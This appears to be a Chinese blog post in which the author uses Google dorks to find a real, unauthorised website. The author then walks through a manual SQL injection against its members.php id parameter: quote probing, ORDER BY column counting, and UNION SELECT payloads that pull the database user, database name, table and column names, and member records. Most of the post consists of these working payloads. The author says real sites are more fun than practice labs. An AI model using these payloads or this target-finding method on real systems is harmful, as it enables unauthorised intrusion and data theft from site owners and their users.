本文深入讲解SQL注入原理,演示如何通过Google黑语法发现潜在目标,利用单引号、orderby及联合查询等技巧确定数据库结构。并通过实例展示如何获取数据库信息,如用户名、数据库名及表结构,最终获取具体数据。
作者丨程橙橙
来源丨孑蝉(jiechan-aci)
前言:
学了sql注入一段时间了,也在顺利通关过墨者靶场。不过,靶场哪有真实网站好玩?
何为sql注入?
sql注入就是sql+注入,不清楚可以百度。
寻找网站:
google黑语法:
谷歌搜索也蛮有意思的,打inurl自动推荐了很多关键词,比如:“inurl php id”。
为什么不用百度呢?
少,并且找的多数为国内。
①、试探
http://www.xxx.org/members.php?id=1
用单引号“'”的时候,是会报错的。
接着测试,order by 5 ,以第5列进行排列,报错。当 表<=实际列数,就不会报错。
http://www.xxx.org/members.php?id=1 order by 5
http://www.xxx.org/members.php?id=1 order by 4
由以上可知,当前表的列为4。
知道了几列,接下来就能知道回显的是哪几列。
②、联合注入
http://www.xxx.org/members.php?id=1 and false union select 1,2,3,4
回显了2,4列。
http://www.xxx.org/members.php?id=1 and false union select 1,user(),3,database()
接下来查字典库,information_schema。
http://www.xxx.org/members.php?id=1 and false union select 1,user(),3,(selecttable_name from information_schema.tables where table_schema=database() limit0,1)
http://www.xxx.org/members.php?id=1 and false union select 1,(select id from db83231_asfaa.members limit 0,1),3,(select column_name frominformation_schema.columns where table_schema=database() andtable_name='members' limit 0,1)
concat字段查一查,member表里面到底有点啥。
http://www.xxx.org/members.php?id=1 and false union select 1,(select concat(id,nome,imagem,texto) from db83231_asfaa.members limit 0,1),3,(selectcolumn_name from information_schema.columns where table_schema=database() andtable_name='members' limit 0,1)
???
...
这是个什么网站呢?
有点意思。。。还好查的都是网站允许显示的数据,不涉及敏感数据。
sqlmap就不上了(只能查出三个数据库,没权限)。
嗯。。。到此为止。
近期精彩内容推荐:
在看点这里
好文分享给更多人↓↓
扫一扫
1038
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
